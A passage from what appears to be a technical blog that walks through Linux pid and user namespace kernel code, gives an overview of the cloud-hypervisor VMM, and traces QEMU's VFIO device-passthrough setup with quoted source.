        INIT_WORK(&ns->proc_work, proc_cleanup_work);

        set_bit(0, ns->pidmap[0].page);
        atomic_set(&ns->pidmap[0].nr_free, BITS_PER_PAGE - 1);

        for (i = 1; i < PIDMAP_ENTRIES; i++)
            atomic_set(&ns->pidmap[i].nr_free, BITS_PER_PAGE);

        return ns;
    }

This function is quite easy, ‘ns->pidmap[0].page’ is the bitmap used to allocate/delete pid value.

‘create_pid_cachep’ is used to create the ‘struct pid’ cache. It is defined as following:

    struct pid
    {
        atomic_t count;
        unsigned int level;
        /* lists of tasks that use this pid */
        struct hlist_head tasks[PIDTYPE_MAX];
        struct rcu_head rcu;
        struct upid numbers[1];
    };

    struct upid {
        /* Try to keep pid_chain in the same cacheline as nr for find_vpid */
        int nr;
        struct pid_namespace *ns;
        struct hlist_node pid_chain;
    };

Every process has a ‘struct pid’,

Following pic shows the data structure relation. A process may reference another ‘pid’, the ‘task’s in ‘struct pid’ is used for this. ‘struct upid’ stores the pid value in ‘nr’ member, the ‘pid_chain’ member is used to link the ‘struct upid’ in ‘pid_hash’ hash table.

For a process, it has a ‘level+1’ pid value, one in his pid namespace, and one for every his parent pid namespace. So in ‘create_pid_cachep’, it allocates a ‘struct pid’ and ‘level’ numbers of ‘struct upid’.

    static struct kmem_cache *create_pid_cachep(int nr_ids)
    {
        struct pid_cache *pcache;
        struct kmem_cache *cachep;

        mutex_lock(&pid_caches_mutex);
        list_for_each_entry(pcache, &pid_caches_lh, list)
            if (pcache->nr_ids == nr_ids)
                goto out;

        pcache = kmalloc(sizeof(struct pid_cache), GFP_KERNEL);
        if (pcache == NULL)
            goto err_alloc;

        snprintf(pcache->name, sizeof(pcache->name), "pid_%d", nr_ids);
        cachep = kmem_cache_create(pcache->name,
                sizeof(struct pid) + (nr_ids - 1) * sizeof(struct upid),
                0, SLAB_HWCACHE_ALIGN, NULL);
        if (cachep == NULL)
            goto err_cachep;

        pcache->nr_ids = nr_ids;
        pcache->cachep = cachep;
        list_add(&pcache->list, &pid_caches_lh);
    out:
        mutex_unlock(&pid_caches_mutex);
        return pcache->cachep;
    }

pid management

‘struct pid’ is created by ‘alloc_pid’ called by ‘copy_process’.

    struct pid *alloc_pid(struct pid_namespace *ns)
    {
        struct pid *pid;
        enum pid_type type;
        int i, nr;
        struct pid_namespace *tmp;
        struct upid *upid;
        int retval = -ENOMEM;

        pid = kmem_cache_alloc(ns->pid_cachep, GFP_KERNEL);
        tmp = ns;
        pid->level = ns->level;
        for (i = ns->level; i >= 0; i--) {
            nr = alloc_pidmap(tmp);
            if (IS_ERR_VALUE(nr)) {
                retval = nr;
                goto out_free;
            }

            pid->numbers[i].nr = nr;
            pid->numbers[i].ns = tmp;
            tmp = tmp->parent;
        }

        if (unlikely(is_child_reaper(pid))) {
            if (pid_ns_prepare_proc(ns)) {
                disable_pid_allocation(ns);
                goto out_free;
            }
        }

        get_pid_ns(ns);
        atomic_set(&pid->count, 1);
        for (type = 0; type < PIDTYPE_MAX; ++type)
            INIT_HLIST_HEAD(&pid->tasks[type]);

        upid = pid->numbers + ns->level;
        spin_lock_irq(&pidmap_lock);
        if (!(ns->nr_hashed & PIDNS_HASH_ADDING))
            goto out_unlock;
        for ( ; upid >= pid->numbers; --upid) {
            hlist_add_head_rcu(&upid->pid_chain,
                    &pid_hash[pid_hashfn(upid->nr, upid->ns)]);
            upid->ns->nr_hashed++;
        }
        spin_unlock_irq(&pidmap_lock);

        return pid;
    }

Every process has ‘level+1’ pid value, one for every namespace that can see this process. In the first for loop, ‘alloc_pidmap’ return the pid value for this process in pid_namespace ‘tmp’. In the last for loop, we use the ‘upid->nr’ and ‘upid->ns’ as the key and insert the ‘struct upid’ to the crosspending ‘pid_hash’ table. In this function, we also initialize ‘pid->tasks’ list head. This list head is used to link the process that uses this ‘struct pid’. ‘struct pid_link’ is used to link the ‘task_struct’ and ‘pid’.

    struct pid_link
    {
        struct hlist_node node;
        struct pid *pid;
    };

Here ‘node’ is the list entry links to ‘pid->tasks’. And ‘pid’ point to the ‘struct pid’. In ‘copy_process’, we can see following code:

    if (likely(p->pid)) {
        ptrace_init_task(p, (clone_flags & CLONE_PTRACE) || trace);

        init_task_pid(p, PIDTYPE_PID, pid);
        if (thread_group_leader(p)) {
            init_task_pid(p, PIDTYPE_PGID, task_pgrp(current));
            init_task_pid(p, PIDTYPE_SID, task_session(current));

            if (is_child_reaper(pid)) {
                ns_of_pid(pid)->child_reaper = p;
                p->signal->flags |= SIGNAL_UNKILLABLE;
            }

            p->signal->leader_pid = pid;
            p->signal->tty = tty_kref_get(current->signal->tty);
            list_add_tail(&p->sibling, &p->real_parent->children);
            list_add_tail_rcu(&p->tasks, &init_task.tasks);
            attach_pid(p, PIDTYPE_PGID);
            attach_pid(p, PIDTYPE_SID);
            __this_cpu_inc(process_counts);
        } else {
            current->signal->nr_threads++;
            atomic_inc(&current->signal->live);
            atomic_inc(&current->signal->sigcnt);
            list_add_tail_rcu(&p->thread_group,
                    &p->group_leader->thread_group);
            list_add_tail_rcu(&p->thread_node,
                    &p->signal->thread_head);
        }
        attach_pid(p, PIDTYPE_PID);
        nr_threads++;
    }


    static inline void
    init_task_pid(struct task_struct *task, enum pid_type type, struct pid *pid)
    {
        task->pids[type].pid = pid;
    }


    static inline struct pid *task_pgrp(struct task_struct *task)
    {
        return task->group_leader->pids[PIDTYPE_PGID].pid;
    }

    void attach_pid(struct task_struct *task, enum pid_type type)
    {
        struct pid_link *link = &task->pids[type];
        hlist_add_head_rcu(&link->node, &link->pid->tasks[type]);
    }

If the created thread is a thread group lead, we need to use the ‘current’ task_struct’s group leader to initialize ‘task->pids[PIDTYPE_PGID]’ and attach this created task to the group leader’s ‘pid->tasks’.

Following pic show the data structure relation.

user namespace internals

2019-12-17T00:00:00+00:00

Namespace is another method to abstract resouces. A namespace make it appear to the process within the namespace that they have their own isolated instance of the global resouces. Compared to the virtual machine, namespace is more lightweight. In this post, I will dig into the user namespace from kernel part. I used kernel 4.4 in this post.

Basic structure

There are six different types of namespaces, they are uts, ipc, mount, pid, net and user. The former five namespaces is structured together in ‘nsproxy’ structure.

struct nsproxy {
    atomic_t count;
    struct uts_namespace *uts_ns;
    struct ipc_namespace *ipc_ns;
    struct mnt_namespace *mnt_ns;
    struct pid_namespace *pid_ns_for_children;
    struct net 	     *net_ns;
};

‘task_struct’ has a ‘nsproxy’ member pointing to a ‘struct nsproxy’ to present the process’s resource view. However the ‘struct nsproxy’ has no user namespace. User namespace is special as it is used for the process’s crendential. A user namespace is represented by ‘struct user_namespace’. ‘struct task_struct’s cred contains the process’s credential information. ‘struct cred’ has a ‘user_ns’ member to point the process’s namespace. ‘struct user_namespace’ has following definition:

    struct user_namespace {
        struct uid_gid_map	uid_map;
        struct uid_gid_map	gid_map;
        struct uid_gid_map	projid_map;
        atomic_t		count;
        struct user_namespace	*parent;
        int			level;
        kuid_t			owner;
        kgid_t			group;
        struct ns_common	ns;
        unsigned long		flags;

        /* Register of per-UID persistent keyrings for this namespace */
    #ifdef CONFIG_PERSISTENT_KEYRINGS
        struct key		*persistent_keyring_register;
        struct rw_semaphore	persistent_keyring_register_sem;
    #endif
    };

‘struct uid_gid_map’ defines the mapping of uid/gid between process user namespace and child namespace. ‘parent’ points to the parent user namespace. Just as other namespaces, user namespace has a hierarchy structure, the ‘level’ represent the level of hierarchy. ‘owner’/’group’ is the effective uid/gid of the process. ‘ns’ is the common structure of namespace.

‘struct uid_gid_map’ is defined as follows:

    struct uid_gid_map {	/* 64 bytes -- 1 cache line */
        u32 nr_extents;
        struct uid_gid_extent {
            u32 first;
            u32 lower_first;
            u32 count;
        } extent[UID_GID_MAP_MAX_EXTENTS];
    };

As we know, when we write to /proc/PID/uid_map, we define the process’s user namespace and his parent user namespace mapping of uid. The uid/gid_map has following format:

    ID-inside-ns   ID-outside-ns   length

Here ‘ID-inside-ns’ is the ‘uid_gid_extent’s ‘first’ member, ‘ID-outside-ns’ is the ‘uid_gid_extent’s ‘lower_first’ member and ‘length’ is the ‘count’ member. The uid/gid_map can have UID_GID_MAP_MAX_EXTENTS(5) lines. The ‘lower’ in ‘lower_first’ represent parent user namespace.

Following pic shows the data structure relation.

System call behavior of user namespace

clone

The most common way to create new namespaces is using clone system call. The most work is done in ‘copy_process’ function. ‘copy_creds’ is used to copy the parent’s cred and copy user namespace. The other namespaces is created in ‘copy_namespaces’ function.

    int copy_creds(struct task_struct *p, unsigned long clone_flags)
    {
        struct cred *new;
        int ret;

        ...
        new = prepare_creds();
        if (!new)
            return -ENOMEM;

        if (clone_flags & CLONE_NEWUSER) {
            ret = create_user_ns(new);
            if (ret < 0)
                goto error_put;
        }

        ...
        atomic_inc(&new->user->processes);
        p->cred = p->real_cred = get_cred(new);
        alter_cred_subscribers(new, 2);
        validate_creds(new);
        return 0;
    }

If the userspace specify ‘CLONE_NEWUSER’, ‘copy_creds’ will call ‘create_user_ns’ to create a new user namespace.

    int create_user_ns(struct cred *new)
    {
        struct user_namespace *ns, *parent_ns = new->user_ns;
        kuid_t owner = new->euid;
        kgid_t group = new->egid;
        int ret;

        if (parent_ns->level > 32)
            return -EUSERS;

        /*
        * Verify that we can not violate the policy of which files
        * may be accessed that is specified by the root directory,
        * by verifing that the root directory is at the root of the
        * mount namespace which allows all files to be accessed.
        */
        if (current_chrooted())
            return -EPERM;

        /* The creator needs a mapping in the parent user namespace
        * or else we won't be able to reasonably tell userspace who
        * created a user_namespace.
        */
        if (!kuid_has_mapping(parent_ns, owner) ||
            !kgid_has_mapping(parent_ns, group))
            return -EPERM;

        ns = kmem_cache_zalloc(user_ns_cachep, GFP_KERNEL);
        if (!ns)
            return -ENOMEM;

        ret = ns_alloc_inum(&ns->ns);
        if (ret) {
            kmem_cache_free(user_ns_cachep, ns);
            return ret;
        }
        ns->ns.ops = &userns_operations;

        atomic_set(&ns->count, 1);
        /* Leave the new->user_ns reference with the new user namespace. */
        ns->parent = parent_ns;
        ns->level = parent_ns->level + 1;
        ns->owner = owner;
        ns->group = group;

        /* Inherit USERNS_SETGROUPS_ALLOWED from our parent */
        mutex_lock(&userns_state_mutex);
        ns->flags = parent_ns->flags;
        mutex_unlock(&userns_state_mutex);

        set_cred_user_ns(new, ns);

    #ifdef CONFIG_PERSISTENT_KEYRINGS
        init_rwsem(&ns->persistent_keyring_register_sem);
    #endif
        return 0;
    }

First we need do some check. The namespace’s level can has 32 maximum. The chrooted process can’t create namespace. The creator also need to has a mapping in the parent user namespace so that we can track the namespace’s parental relation. ‘kuid_has_mapping’ has following definition:

    static inline bool kuid_has_mapping(struct user_namespace *ns, kuid_t uid)
    {
        return from_kuid(ns, uid) != (uid_t) -1;
    }

    uid_t from_kuid(struct user_namespace *targ, kuid_t kuid)
    {
        /* Map the uid from a global kernel uid */
        return map_id_up(&targ->uid_map, __kuid_val(kuid));
    }

    static u32 map_id_up(struct uid_gid_map *map, u32 id)
    {
        unsigned idx, extents;
        u32 first, last;

        /* Find the matching extent */
        extents = map->nr_extents;
        smp_rmb();
        for (idx = 0; idx < extents; idx++) {
            first = map->extent[idx].lower_first;
            last = first + map->extent[idx].count - 1;
            if (id >= first && id <= last)
                break;
        }
        /* Map the id or note failure */
        if (idx < extents)
            id = (id - first) + map->extent[idx].first;
        else
            id = (u32) -1;

        return id;
    }

The ‘creator’(parent process’ euid) must has a mapping in the parent namespace. If not, the child namespace will has no information who created a user namespace.

After all thess check, ‘create_user_ns’ allocates a ‘user_namespace’ struct and do some intialization. We need to set the new created user_namespace’s parent to its parent user_namespace, and add its level. Finally in ‘set_cred_user_ns’ the ‘cred’s ‘user_ns’ member is set to the newly created ‘user_namespace’.

unshare

The unshare system call is easy, as it just create a new user_namespace for the caller process.

    int unshare_userns(unsigned long unshare_flags, struct cred **new_cred)
    {
        struct cred *cred;
        int err = -ENOMEM;

        if (!(unshare_flags & CLONE_NEWUSER))
            return 0;

        cred = prepare_creds();
        if (cred) {
            err = create_user_ns(cred);
            if (err)
                put_cred(cred);
            else
                *new_cred = cred;
        }

        return err;
    }

setns

Another way we can change the process to a new user namespace is using setns system call. This system call need a fd reffering to a namespace, which is in /proc/PID/ns/xxx. ‘create_new_namespaces’ function does nothing for user namespace. The calling ‘ns->ops->install’ does the work. First get ths ‘ns_common’ struct from the ‘file struct’.

    SYSCALL_DEFINE2(setns, int, fd, int, nstype)
    {
        struct task_struct *tsk = current;
        struct nsproxy *new_nsproxy;
        struct file *file;
        struct ns_common *ns;
        int err;

        file = proc_ns_fget(fd);
       
        ns = get_proc_ns(file_inode(file));
        if (nstype && (ns->ops->type != nstype))
            goto out;

        new_nsproxy = create_new_namespaces(0, tsk, current_user_ns(), tsk->fs);

        err = ns->ops->install(new_nsproxy, ns);
        
        switch_task_namespaces(tsk, new_nsproxy);
    out:
        fput(file);
        return err;
    }

For user namespace, the ‘ns->ops->install’ callback is ‘userns_install’.

    static int userns_install(struct nsproxy *nsproxy, struct ns_common *ns)
    {
        struct user_namespace *user_ns = to_user_ns(ns);
        struct cred *cred;

        /* Don't allow gaining capabilities by reentering
        * the same user namespace.
        */
        if (user_ns == current_user_ns())
            return -EINVAL;

        /* Tasks that share a thread group must share a user namespace */
        if (!thread_group_empty(current))
            return -EINVAL;

        if (current->fs->users != 1)
            return -EINVAL;

        if (!ns_capable(user_ns, CAP_SYS_ADMIN))
            return -EPERM;

        cred = prepare_creds();
        if (!cred)
            return -ENOMEM;

        put_user_ns(cred->user_ns);
        set_cred_user_ns(cred, get_user_ns(user_ns));

        return commit_creds(cred);
    }

First get a ‘user_namespace’ from a ‘ns_common’ struct. After doing some check, it ‘set_cred_user_ns’ to set the process’ cred’s ‘user_ns’ member to the fd referring to.

getuid

    SYSCALL_DEFINE0(getuid)
    {
        /* Only we change this so SMP safe */
        return from_kuid_munged(current_user_ns(), current_uid());
    }


    uid_t from_kuid_munged(struct user_namespace *targ, kuid_t kuid)
    {
        uid_t uid;
        uid = from_kuid(targ, kuid);

        if (uid == (uid_t) -1)
            uid = overflowuid;
        return uid;
    }

The ‘current_uid’ return the user’s UID. ‘from_kuid’ return the mapping uid of ‘kuid’ in user namespace ‘targ’. If there is no mapping. the ‘overlowuid’ is returned. This is ‘DEFAULT_OVERFLOWUID’. This is why we get following result if we just create a user namespace and not set the /proc/PID/uid_map mapping file.

    test@ubuntu:~/nstest$ unshare -U
    nobody@ubuntu:~/nstest$ id
    uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)

User namespace hierarchy

From the last part, every user namespace has a parent except the ‘init_user_ns’. ‘init_user_ns’ is hard-coded in the kernel as following:

    struct user_namespace init_user_ns = {
        .uid_map = {
            .nr_extents = 1,
            .extent[0] = {
                .first = 0,
                .lower_first = 0,
                .count = 4294967295U,
            },
        },
        .gid_map = {
            .nr_extents = 1,
            .extent[0] = {
                .first = 0,
                .lower_first = 0,
                .count = 4294967295U,
            },
        },
        .projid_map = {
            .nr_extents = 1,
            .extent[0] = {
                .first = 0,
                .lower_first = 0,
                .count = 4294967295U,
            },
        },
        .count = ATOMIC_INIT(3),
        .owner = GLOBAL_ROOT_UID,
        .group = GLOBAL_ROOT_GID,
        .ns.inum = PROC_USER_INIT_INO,
    #ifdef CONFIG_USER_NS
        .ns.ops = &userns_operations,
    #endif
        .flags = USERNS_INIT_FLAGS,
    #ifdef CONFIG_PERSISTENT_KEYRINGS
        .persistent_keyring_register_sem =
        __RWSEM_INITIALIZER(init_user_ns.persistent_keyring_register_sem),
    #endif
    };

As we can see, the uid/gid mapping is the identical mapping. So if the process not use user namespace there is no effective. Les’t take an example. Say we have a user which uid is 1000. Its user namespace is the ‘init_user_ns’.

Then the user creates two user namespaces named ‘us1’ and ‘us2’. The ‘us1’ has a ‘0 1000 20’ uid_map and the ‘us2’ has a ‘200 1000 20’ uid_map. When write to the /proc/PDI/uid_map file. The ‘proc_uid_map_write’ is called and finally ‘map_write’ is called. In this function we can see how the ‘uid_gid_map’ is constructed.

	extent->first = simple_strtoul(pos, &pos, 10);
	if (!isspace(*pos))
		goto out;

	pos = skip_spaces(pos);
	extent->lower_first = simple_strtoul(pos, &pos, 10);
	if (!isspace(*pos))
		goto out;

	pos = skip_spaces(pos);
	extent->count = simple_strtoul(pos, &pos, 10);
	if (*pos && !isspace(*pos))
		goto out;

When the userspace read /proc/PID/uid_map, it uses a seq_file method. When the file is opened, the kernel calls ‘proc_id_map_open’.

    static int proc_id_map_open(struct inode *inode, struct file *file,
        const struct seq_operations *seq_ops)
    {
        struct user_namespace *ns = NULL;
        struct task_struct *task;
        struct seq_file *seq;
        int ret = -EINVAL;

        task = get_proc_task(inode);
        if (task) {
            rcu_read_lock();
            ns = get_user_ns(task_cred_xxx(task, user_ns));
            rcu_read_unlock();
            put_task_struct(task);
        }
        if (!ns)
            goto err;

        ret = seq_open(file, seq_ops);
        if (ret)
            goto err_put_ns;

        seq = file->private_data;
        seq->private = ns;

        return 0;
    err_put_ns:
        put_user_ns(ns);
    err:
        return ret;
    }

Here we should notice, the ‘seq->private’ stores the /proc/PID/uid_map’s process’s user namespace. And also ‘seq_open’ sets the ‘seq_file->file’ to the file’s struct file.

Following is the show process of the /proc/PID/uid_map.

    static int uid_m_show(struct seq_file *seq, void *v)
    {
        struct user_namespace *ns = seq->private;
        struct uid_gid_extent *extent = v;
        struct user_namespace *lower_ns;
        uid_t lower;

        lower_ns = seq_user_ns(seq);
        if ((lower_ns == ns) && lower_ns->parent)
            lower_ns = lower_ns->parent;

        lower = from_kuid(lower_ns, KUIDT_INIT(extent->lower_first));

        seq_printf(seq, "%10u %10u %10u\n",
            extent->first,
            lower,
            extent->count);

        return 0;
    }


    static inline struct user_namespace *seq_user_ns(struct seq_file *seq)
    {
    #ifdef CONFIG_USER_NS
        return seq->file->f_cred->user_ns;
    #else
        extern struct user_namespace init_user_ns;
        return &init_user_ns;
    #endif
    }

The ‘ns’ is the process’s user namespace, and the ‘lower_ns’ is the open process’s user namespace. So here we can see different open process may have different value of /proc/PID/uid_map. We have talked about ‘from_kuid’ above, it returns the ‘kuid’s mapping in the ‘targ’ user_namespace.

So let’s say our example. us1 has ‘0 1000 1’ uid_map, us2 has ‘200 1000 1’ uid_map.

So When the process in us1 read the process in us2’s /proc/US2/uid_map. The ‘lower_ns’ in ‘uid_m_show’ will be the us1 process, the ‘extent’ will be the us2 process. So it will show ‘200 0 1’. Conversely, when the process in us2 read the /proc/US1/uid_map. It will show ‘0 200 1’.

Following pics show the case.

A brief overview of cloud-hypervisor, a modern VMM

2019-09-07T00:00:00+00:00

Background

Several months ago, intel made the cloud-hypervisor open sourced. The cloud-hypervisor’s development is driven by the idea that in modern world we need a more light, more security, and more efficiency VMM. The traditional solution of cloud virtual machine is qemu and kvm. In cloud, we just need an environment to run workloads, there is no need to pay for the legacy devices which qemu emulates. Also qemu is written using C which is considered harmful. Rust is a security language which is a good choice to build next-generation VMM. Google implements the first Rust-based light VMM called crosvm which is in Fuchsia operating system. Then aws develops his own light VMM called firecracked which is based of crosvm. After the birth of crosvm and firecracker, some companies realize that there are lots of reduplication in crosvm and firecracker, also if someone wants to write a Rust-based VMM, it need do these reduplication again. To get avoid this, these companies setup a rust-vmm project. rust-vmm abstracts the common virtualization components which implements a Rust-based VMM required to be crate. These components contains kvm wrapper, virtio devices and some utils, etc. People who wants to implement a Rust-based VMM can util these components. This makes write a Rust-based VMM very easy.

Cloud-hypervisor is developed under this background by intel. It uses some code of rust-vmm(vm-memory, kvm_ioctls), firecracker and crosvm. The cloud-hypervisor’s page contains the detailed usage info.

Architecture

As we know, qemu emulates a whole machine system. Below is a diagram of the i440fx architecture(from qemu sites).

As we can see the topology of qemu emulates is nearly same as the physical machine. We need a i440fx motherboard, the pci host bridge, the pci bus bus tree, the superio controller and isa bus tree.

However we don’t need this compilcated emulation. The most that we need for cloud workloads is computing, networking, storage. So cloud-hypervisor has following architecture.

As we can see, the cloud-hypervisor’s architecutre is very easy, it even has no abstract of motherboard. It has just several virtio devices, no isa bus, no PCI bus tree. Following shows the pci devices.

Some code

Following diagram shows the basic function callchains.

Some of the notes:

cloud-hypervisor utils several rust-vmm components, such as vm-memory(for memory region), vm-allocator(for memory space and irq allocation), kvm-bindings(for kvm ioctl), linux-loader(for loading kernel elf file) and so on.

Like firecracker, cloud-hypervisor loads the kernel to VM’s space and set the vcpu’s PC to startup_64(entrypoint of vmlinux). Also cloud-hypervisor implements a firmware loader.

The memory region and irq resource is managed by a BTree.

Implement a legacy device (i8042) to shutdown the VM.

There are also some other interesting things in cloud-hypervisor/rust-vmm/firecracker/crosvm.

Anyway, the cloud-hypervisor has a clear architecture, it reduces the complexity of devices/buses which qemu has to emulate.

qemu VM device passthrough using VFIO, the code analysis

2019-08-31T00:00:00+00:00

QEMU uses VFIO to assign physical devices to VMs. When using vfio, the qemu command line should add following option:

    -device vfio-pci,host=00:12.0,id=net0

This adds a vfio-pci device sets the physical device’s path to ‘host’. As we have said in the VFIO driver analysis post VFIO decomposes the physical device as a set of userspace API and recomposes the physical device’s resource. So the most work of the vfio-pci device’s realization ‘vfio_realize’ is to decompose the physical device and setup the relation of the physical device’s resource with the virtual machine.

Bind the device to a domain

The physical device which will be assigned to VM has been bind to vfio-pci, the group in ‘/dev/vfio/’ has been created. So ‘vfio_realize’ first check the device and get the device’s groupid. Then it call ‘vfio_get_group’. Following is the call chain of this function.

    vfio_get_group
            ->qemu_open("/dev/vfio/$groupid")
            ->vfio_connect_container
                    ->qemu_open("/dev/vfio/vfio")
                    ->vfio_init_container
                            ->ioctl(VFIO_GROUP_SET_CONTAINER)
                            ->ioctl(VFIO_SET_IOMMU)
                    ->vfio_kvm_device_add_group
                    ->memory_listener_register

‘vfio_get_group’ first open the group file in ‘/dev/vfio/$groupid’. ‘vfio_connect_container’ opens a new container and calls ‘vfio_init_container’ to add this vfio group to the container. After ‘vfio_init_container’, the device has been related with a conatiner. And the root iommu’s root table has been setup.

‘vfio_kvm_device_add_group’ bridges the ‘kvm’ subsystem and ‘iommu’ subsystem. In the final ‘vfio_connect_container’ it registers a ‘vfio_memory_listener’ to listen the memory layout change event. In the ‘region_add’ callback it calls ‘vfio_dma_map’ to setup the gpa(iova)->hpa. When the guest uses the gpa in DMA programming, the iommu can translate this gpa to hpa and access the physical memory directly.

Populate the device's resource

After setting the device’s DMA remapping, ‘vfio_realize’ will get the device’s resource and use these resources to reconstruct the vfio-pci device.

First ‘vfio_get_device’ get the vfio device’s fd by calling ‘ioctl(VFIO_GROUP_GET_DEVICE_FD)’ with the assigned device’ name. Then ‘vfio_get_device’ calls ‘ioctl(VFIO_DEVICE_GET_INFO)’ on the device fd and get the basic info of the device.

    struct vfio_device_info {
            __u32	argsz;
            __u32	flags;
    #define VFIO_DEVICE_FLAGS_RESET	(1 << 0)	/* Device supports reset */
    #define VFIO_DEVICE_FLAGS_PCI	(1 << 1)	/* vfio-pci device */
    #define VFIO_DEVICE_FLAGS_PLATFORM (1 << 2)	/* vfio-platform device */
    #define VFIO_DEVICE_FLAGS_AMBA  (1 << 3)	/* vfio-amba device */
    #define VFIO_DEVICE_FLAGS_CCW	(1 << 4)	/* vfio-ccw device */
    #define VFIO_DEVICE_FLAGS_AP	(1 << 5)	/* vfio-ap device */
            __u32	num_regions;	/* Max region index + 1 */
            __u32	num_irqs;	/* Max IRQ index + 1 */
    };

Return to ‘vfio_realize’, after ‘vfio_get_device’ it calls ‘vfio_populate_device’ to populate the device’s resource. ‘vfio_populate_device’ get the 6 BAR region info and 1 PCI config region info and 1 vga region info(If has). ‘vfio_region_setup’ is called to populated the BAR region. Every region is strored in a ‘VFIORegion’.

    typedef struct VFIORegion {
    struct VFIODevice *vbasedev;
    off_t fd_offset; /* offset of region within device fd */
    MemoryRegion *mem; /* slow, read/write access */
    size_t size;
    uint32_t flags; /* VFIO region flags (rd/wr/mmap) */
    uint32_t nr_mmaps;
    VFIOMmap *mmaps;
    uint8_t nr; /* cache the region number for debug */
    } VFIORegion;

When we unbind the physical device from its driver, and rebind it with vfio-pci driver, the resource of device is released. Here the ‘fd_offset’ represent the offset within the device fd doing mmap. ‘mem’ is used for qemu to represent on IO region.

Calling ioctl(VFIO_DEVICE_GET_REGION_INFO) on the device fd we can get the region info, the most important is regions’s size, flags, fd_offset, and index.

After getting the io region info, ‘vfio_populate_device’ gets the PCI configuration region.

Later in the ‘vfio_realize’ it calls ‘vfio_bars_prepare’ and ‘vfio_bars_register’ to mmap the device’s io region to usespace. ‘vfio_bars_prepare’ calls ‘vfio_bar_prepare’ for every io region. ‘vfio_bar_prepare’ get the info of the io region such as “the IO region is ioport or mmio”, “the mem type of thsi IO region’. ‘vfio_bars_register’ calls ‘vfio_bar_register’ on every io region. ‘vfio_bar_register’ initialize a MemoryRegion and calls ‘vfio_region_mmap’ to mmap the device io region to userspace. Finally ‘vfio_bar_register’ calls ‘pci_register_bar’ to register BAR for vfio-pci device. Here we can see the parameter of ‘pci_register_bar’ is from the physical device.

    static void vfio_bar_register(VFIOPCIDevice *vdev, int nr)
    {
    VFIOBAR *bar = &vdev->bars[nr];
    char *name;

    if (!bar->size) {
            return;
    }

    bar->mr = g_new0(MemoryRegion, 1);
    name = g_strdup_printf("%s base BAR %d", vdev->vbasedev.name, nr);
    memory_region_init_io(bar->mr, OBJECT(vdev), NULL, NULL, name, bar->size);
    g_free(name);

    if (bar->region.size) {
            memory_region_add_subregion(bar->mr, 0, bar->region.mem);

            if (vfio_region_mmap(&bar->region)) {
            error_report("Failed to mmap %s BAR %d. Performance may be slow",
                            vdev->vbasedev.name, nr);
            }
    }

    pci_register_bar(&vdev->pdev, nr, bar->type, bar->mr);
    }

Following figure shows the data structure of VFIORegion.

Here we can see, the vfio-pci IO region actually has the backend qemu’s virtual memory. It is the IO region of the physical device mapped into the userspace. In normal qemu virtual device case, the IO region is not backed with a region of virtual memory, so when the guest access these IO region, it traps into the qemu by EPT misconfiguration. For vfio-pci virtual device, its IO region has a backend virtual memory, so when the qemu setup the EPT map, this will also setup these IO region. When the guest access the vfio-pci device’s IO region. It just accesses the physical device IO region. Remember the userspace IO region of vfio-pci device is mammped from the physical device.

Config the device

In ‘vfio_populate_device’ it will get the PCI configuration region’s size and offset within the vfio device fd. In ‘vfio_realize’ after ‘vfio_populate_device’ it calls ‘pread’ to read the device’s PCI config region and store it in ‘vdev->pdev.config’.

    ret = pread(vdev->vbasedev.fd, vdev->pdev.config,
                    MIN(pci_config_size(&vdev->pdev), vdev->config_size),
                    vdev->config_offset);

‘vfio_realize’ then allocates a ‘emulated_config_bits’space. This space contains the bits to indicate which ‘PCI config region’ is used when the guest access the vfio pci device’s pci config region. If the byte(bits) in the ‘emulated_config_bits’ is set, ‘vdev->pdev.config’ is used, if it is not set, the qemu will access the physical device’s PCI config region.

‘vfio_realize’ configures the vfio pci device according the physical device, for example reading the ‘PCI_VENDOR_ID’ to assign to ‘vdev->vendor_id’, and the ‘PCI_DEVICE_ID’ to assign to ‘vdev->device_id’. ‘vfio_pci_size_rom’, ‘vfio_msix_early_setup’, ‘vfio_add_capabilities’ just operates the PCI configuration region.

Then ‘vfio_realize’ setup the device’s interrupt process.

    if (vfio_pci_read_config(&vdev->pdev, PCI_INTERRUPT_PIN, 1)) {
            vdev->intx.mmap_timer = timer_new_ms(QEMU_CLOCK_VIRTUAL,
                                                    vfio_intx_mmap_enable, vdev);
            pci_device_set_intx_routing_notifier(&vdev->pdev, vfio_intx_update);
            ret = vfio_intx_enable(vdev, errp);
            if (ret) {
            goto out_teardown;
            }
    }

Here ‘pci_device_set_intx_routing_notifier’ is called to register a ‘intx_routing_notifier’. We need this because the host bridge of the guest may change the assigned device’s INTx to irq mapping.

    static int vfio_intx_enable(VFIOPCIDevice *vdev, Error **errp)
    {
    uint8_t pin = vfio_pci_read_config(&vdev->pdev, PCI_INTERRUPT_PIN, 1);
    Error *err = NULL;
    int32_t fd;
    int ret;


    if (!pin) {
            return 0;
    }

    vfio_disable_interrupts(vdev);

    vdev->intx.pin = pin - 1; /* Pin A (1) -> irq[0] */
    pci_config_set_interrupt_pin(vdev->pdev.config, pin);

    #ifdef CONFIG_KVM
    /*
    * Only conditional to avoid generating error messages on platforms
    * where we won't actually use the result anyway.
    */
    if (kvm_irqfds_enabled() && kvm_resamplefds_enabled()) {
            vdev->intx.route = pci_device_route_intx_to_irq(&vdev->pdev,
                                                            vdev->intx.pin);
    }
    #endif

    ret = event_notifier_init(&vdev->intx.interrupt, 0);
    if (ret) {
            error_setg_errno(errp, -ret, "event_notifier_init failed");
            return ret;
    }
    fd = event_notifier_get_fd(&vdev->intx.interrupt);
    qemu_set_fd_handler(fd, vfio_intx_interrupt, NULL, vdev);

    if (vfio_set_irq_signaling(&vdev->vbasedev, VFIO_PCI_INTX_IRQ_INDEX, 0,
                            VFIO_IRQ_SET_ACTION_TRIGGER, fd, &err)) {
            error_propagate(errp, err);
            qemu_set_fd_handler(fd, NULL, NULL, vdev);
            event_notifier_cleanup(&vdev->intx.interrupt);
            return -errno;
    }

    vfio_intx_enable_kvm(vdev, &err);
    if (err) {
            warn_reportf_err(err, VFIO_MSG_PREFIX, vdev->vbasedev.name);
    }

    vdev->interrupt = VFIO_INT_INTx;

    trace_vfio_intx_enable(vdev->vbasedev.name);
    return 0;
    }

‘vfio_intx_enable’ set the vfio pci device’s interrupt. This function initialize an EventNotifier ‘vdev->intx.interrupt’. The ‘read’ of this event notifier is ‘vfio_intx_interrupt’. Then ‘vfio_intx_enable’ calls ‘vfio_set_irq_signaling’ to set the fd as the interrupt eventfd. When host device receives interrupt, it will signal in this eventfd. The handler of this fd which is ‘vfio_intx_interrupt’ will handle this interrupt. This is the common case, but it is not efficient. So ‘vfio_intx_enable_kvm’ is called.

